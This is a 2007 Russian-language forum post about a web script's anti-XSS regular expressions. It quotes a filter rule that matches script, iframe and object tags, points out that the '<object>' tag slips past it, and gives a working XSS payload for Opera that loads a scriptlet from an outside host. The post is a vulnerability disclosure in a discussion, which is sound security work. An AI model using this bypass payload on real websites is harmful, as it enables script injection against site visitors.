29.11.2007, 00:31
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100
Репутация:
2033
|
|
Сообщение от astrologer
Eсли регулярные выражения действительно такие, как показывается, "кое-что" там не одно.
И не два, и не три.  Этих "что-то" там МНОГО. И дело не только в том, сложно или легко учесть в регулярках все известное. Дело в самом знании нигде не записанного.
Кстати, реальные регулярные выражения скрипта такие, как показывается 
Вот, например,
Код:
Input string : <script>
Description : Внедрение опасных html тегов
Filter rule : [<\s]((\/?)script(\/?))|((\/?)[i|I]frame(\/?))|(@import)((\/?)object(\/?))[\s>]
Однако '<object>' на самом деле не фильтруется. В результате имеем XSS под Opera:
PHP код:
'lo><OBJECT TYPE=text/x-scriptlet DATA='http://ha.ckers.org/scriptlet.html
Код, ес-но, можно заточить.
Последний раз редактировалось LeverOne; 29.11.2007 в 20:52..
|
|
|